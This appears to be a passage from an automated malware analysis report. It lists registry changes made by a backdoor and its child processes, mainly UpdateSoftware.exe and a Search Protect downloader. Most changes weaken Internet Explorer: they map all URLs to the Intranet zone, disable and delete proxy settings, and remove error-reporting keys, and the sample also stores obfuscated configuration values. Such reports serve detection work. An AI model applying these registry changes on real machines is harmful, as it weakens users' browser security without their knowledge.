"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows]
"LoadAppInit_DLLs" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

The Backdoor modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Backdoor modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Backdoor modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Backdoor deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The Backdoor disables automatic startup of the application by deleting the following autorun value:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
"SpUninstallCleanUp"

The process cltmng.exe:996 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:

The Backdoor modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Backdoor modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Backdoor modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Backdoor deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process usetup.exe:3420 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "7F 25 DA DC 41 BA AA D7 AC 4B 80 45 A4 DD 4F 07"

The process cltmngui.exe:1296 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:

The Backdoor modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Backdoor modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Backdoor modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Backdoor deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process rundll32.exe:3116 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "21 FA 11 E2 5E 53 E4 C1 73 DA B3 5D FE 3D 30 D1"

The process rundll32.exe:3052 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "1F 3F CC 15 8A C9 CA 4E 0E B0 CA 44 2A A8 13 38"

The process %original file name%.exe:312 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\571c756e-656d-49bc-97e6-a0b536b2c4a3]
"TSAware" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Favorites" = "%Documents and Settings%\All Users\Favorites"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ReceiveTimeout" = "600000"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"NetHood" = "%Documents and Settings%\%current user%\NetHood"
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\571c756e-656d-49bc-97e6-a0b536b2c4a3]
"QuietUninstallString" = "C:\DOCUME~1\ALLUSE~1\APPLIC~1\INSTAL~1\{735B0~1\Setup.exe /remove /q"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"

"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\{735B0250-8ADE-493A-ABD1-C2FCA8B820A6}\Addons]
"usetup.exe" = "usetup"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\571c756e-656d-49bc-97e6-a0b536b2c4a3]
"TizPath" = "c:\%original file name%.exe"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\571c756e-656d-49bc-97e6-a0b536b2c4a3]
"Version" = "16777216"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Administrative Tools" = "%Documents and Settings%\All Users\Start Menu\Programs\Administrative Tools"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
"Templates" = "%Documents and Settings%\%current user%\Templates"

[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsoC1.tmp\, , \??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nskC5.tmp\, , \??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsqB9.tmp\, , \??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsjB4.tmp\, , \??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\Tsu905D28F2.dll,"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\571c756e-656d-49bc-97e6-a0b536b2c4a3]
"UninstallString" = "C:\DOCUME~1\ALLUSE~1\APPLIC~1\INSTAL~1\{735B0~1\Setup.exe /remove /q0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Administrative Tools" = ""
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"SendTo" = "%Documents and Settings%\%current user%\SendTo"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Startup" = "%Documents and Settings%\All Users\Start Menu\Programs\Startup"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\571c756e-656d-49bc-97e6-a0b536b2c4a3]
"EstimatedSize" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 14 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Startup" = "%Documents and Settings%\%current user%\Start Menu\Programs\Startup"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\571c756e-656d-49bc-97e6-a0b536b2c4a3]
"Language" = "1033"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Fonts" = "%WinDir%\Fonts"
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D5 04 7A 4A 78 41 5C DF 3E 0F 79 36 78 73 78 0E"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Programs" = "%Documents and Settings%\All Users\Start Menu\Programs"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\{735B0250-8ADE-493A-ABD1-C2FCA8B820A6}\Addons]
"sp-downloader.exe" = "Search Protect"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Recent" = "%Documents and Settings%\%current user%\Recent"
"Favorites" = "%Documents and Settings%\%current user%\Favorites"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\571c756e-656d-49bc-97e6-a0b536b2c4a3]
"VersionMinor" = "0"
"VersionMajor" = "1"

The Backdoor modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Backdoor modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Backdoor modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Backdoor deletes the following registry key(s):

[HKLM\SOFTWARE\Microsoft\PCHealth\ErrorReporting\DW]

The Backdoor deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

[HKLM\SOFTWARE\Microsoft\PCHealth\ErrorReporting\DW]
"DWFileTreeRoot"

The process nsuB5.exe:516 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:

[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsoC1.tmp\, , \??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nskC5.tmp\, , \??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsqB9.tmp\,"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 16 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "28 32 54 8B C3 55 8B 70 52 06 34 A2 32 66 E1 2F"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

The Backdoor modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Backdoor modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Backdoor modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Backdoor deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process nsuC3.exe:2608 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:

[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsoC1.tmp\, , \??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nskC5.tmp\,"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1B 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A7 FB 67 E2 0C 17 C8 6F ED 0A 12 1D 56 87 F2 06"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

The Backdoor modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Backdoor modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Backdoor modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Backdoor deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process UpdateSoftware.exe:3512 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:

[HKU\.DEFAULT\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_6a096ac0\eae10f9d]
"1c311243" = "GxAy/YV/c/At/XD/c/Ay/XF/cPAj/YV/FlAy/X2/UxAp/X2/GxAk////"
"060df2cd" = "G/Ay/YP/FPAt/X6/clAj/Xl/alAy/XP/blAs/XD/ax/j/Xt/axAv/X6////%"
"0dc3ee96" = "/P////%%"
"7367429f" = "///%"
"e8f9dcc7" = "UlAr/XJ/c//k////"
"2d71d5ab" = "V/////%%"
"7f69fa1f" = "///%"

[HKU\.DEFAULT\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_6a096ac0\00000000]
"493c7345" = ""

[HKU\.DEFAULT\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_6a096ac0\eae10f9d]
"587b5709" = "V/////%%"
"340d3099" = "/P////%%"
"72758a5d" = "///%"
"6185d035" = "VP/h/CP/V//l////"
"0e93c3f3" = "///%"
"51d2f2ea" = "J/Af/X6/GlAf/XD/aPAK/Y//G/Ay/YP/GPAf/B//VP/j/Cx/V/////%%"
"c24899a6" = "MP/f/CF/Mx/l/C/////%"
"d1abcdb6" = "///%"
"37b7a6d8" = "UlAr/XJ/c//k////"
"0c230bcb" = "///%"
"d94388d2" = "GxAy/YV/c/At/XD/c/Ay/XF/cPAj/YV/FlAy/X2/UxAp/X2/GxAk////"
"f0bf0bde" = "///%"
"65114b36" = "Vl/l////"
"f1f24e29" = "Vl/l/C/////%"
"a0743acc" = "N/////%%"
"c6c5dd44" = "V/////%%"

[HKU\.DEFAULT\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_6a096ac0]
"iiid" = "1"

[HKU\.DEFAULT\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_6a096ac0\00000000]
"3efeb33e" = "p01e07x0qx1A06h0n01 06l0nU1Z06t0mU1g0640nl0S06h0nl1A06E0, p01e07x0qx1D06I0mU1O0640n01Y06t0ml1N06b0qx1S02I0ox1S06q0nU0%, p01e07x0qx1N06t0nl1h06O0jx1P06Y0mU1g0640nl0S06h0nl1A06E0, p01T07m0nl1Y06E0qx1h06x0qx1O0640mU1g0640nl0S06h0nl1A06E0"

[HKU\.DEFAULT\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_6a096ac0\eae10f9d]
"3c09c42b" = "///%"
"c5705860" = "Vx////%%"
"c99a5f5c" = "///%"
"414bc593" = "///%"
"a2e3b941" = "///%"
"e46c271e" = "///%"
"fe94ce1e" = "V/////%%"
"1520c6f1" = "V/////%%"
"a1dcff5b" = "V/////%%"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D4 89 44 CE BF E0 60 7D B3 BB 03 65 70 EE BC 05"

[HKU\.DEFAULT\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_6a096ac0\eae10f9d]
"f2c53c49" = "UlAr/XJ/c//k////"

[HKU\.DEFAULT\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_6a096ac0\00000000]
"370856c7" = "p01e07x0qx1A06h0n01 06l0nU1Z06t0mU1g0640nl0S06h0nl1A06E0, p01e07x0qx1D06I0mU1O0640n01Y06t0ml1N06b0qx1S02I0ox1S06q0nU0%, p01e07x0qx1N06t0nl1h06O0jx1P06Y0mU1g0640nl0S06h0nl1A06E0, p01T07m0nl1Y06E0qx1h06x0qx1O0640mU1g0640nl0S06h0nl1A06E0"

[HKU\.DEFAULT\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_6a096ac0\eae10f9d]
"27ddcf6f" = "///%"
"8b9e4cbc" = "V/////%%"
"bbf88800" = "///%"
"38583bc3" = "N//e/Ct/Vx/l/C/////%"

The process UpdateSoftware.exe:3456 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\UpdateSoftware\3956077583\NP6yu5 tnZZH0OQIKE1/gD3hJMqT/]
"NP6yu5 jyYwQburpniZRRB5FiXXl0Nh4RV" = "NP6yu5 qaAnCQDWYSUGOC2EC0BO122uP"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\S-3956077583]
"URLUpdateInfo" = ""
"URLInfoAbout" = ""

[HKLM\SOFTWARE\UpdateSoftware\3956077583\NP6yu5 tnZZH0OQIKE1/gD3hJMqT/]
"NP6yu5 iI0lv89/XZTpmaWCAW6XiF/xIowoplYxrEc" = "NP6yu5 op/1ESUMOQIiA/"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\S-3956077583]
"Publisher" = "PremiumSoft"

[HKLM\SOFTWARE\UpdateSoftware\3956077583\NP6yu5 tnZZH0OQIKE1/gD3hJMqT/]
"NP6yu5 rK2YdOCDWYSo sSZJb0LFNMK7umzJ4f" = "NP6yu5 o4IdosRJLFHmfwN6K"
"NP6yu5 obHhU6789/Xu3lMQKQBU9v0o8l1 pwHGQ7a" = "NP6yu5 ire7AFHwysu7daGH/1I 8/fYQTHvbDbfbFpsZR9hg1ZLTwQJfCgwjG"
"NP6yu5 jnTHsfABCDWtWkUM/W1aPBtS1 VQW3XAfac" = "NP6yu5 su8YtQ34567VnKOTlN"
"NP6yu5 t4SMY89/XZTo241UBcL1FgCdQgO" = "NP6yu5 jnxjzOdefABNqu"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\S-3956077583]
"SilentUninstall" = "c:\documents and settings\all users\application data\softsafe\updatesoftware\updatesoftware.exe /uninstall"

[HKLM\SOFTWARE\UpdateSoftware\3956077583\NP6yu5 tnZZH0OQIKE1/gD3hJMqT/]
"NP6yu5 oRN6utIKEG digPng1ySOBlAVHvZrTks5X3JZ0jUs" = "NP6yu5 o4IdosRJLFHmfwN6K"
"NP6yu5 t p YmhabcdJfHSAepXR5o1j1c DKl8GWf2QPTqLd" = "NP6yu5 ppjyvMvqomje35V 1BvjxcvmJzQBT"
"NP6yu5 qnt FxztvqoDfBtS/GCPHJVoOIo2SDnPtKi" = "NP6yu5 yZKZjefABCDz76N9UmHe0p0kgH5NGRfwxzCZGcCt9/G/oGfA6jw"
"NP6yu5 kq14RlhabcdIjFSyg16YzyLsH" = "NP6yu5 kdK38OABCDWIHtWKZ5PJuKDRJ"
"NP6yu5 qCEj2JrpnikTXYRb/hjk8pv2i7" = "NP6yu5 ire7AFHwysu7daGH/1I 8/fYQTHvbDbfbFpsZR9hg1ZLTwQJfCgwjG"
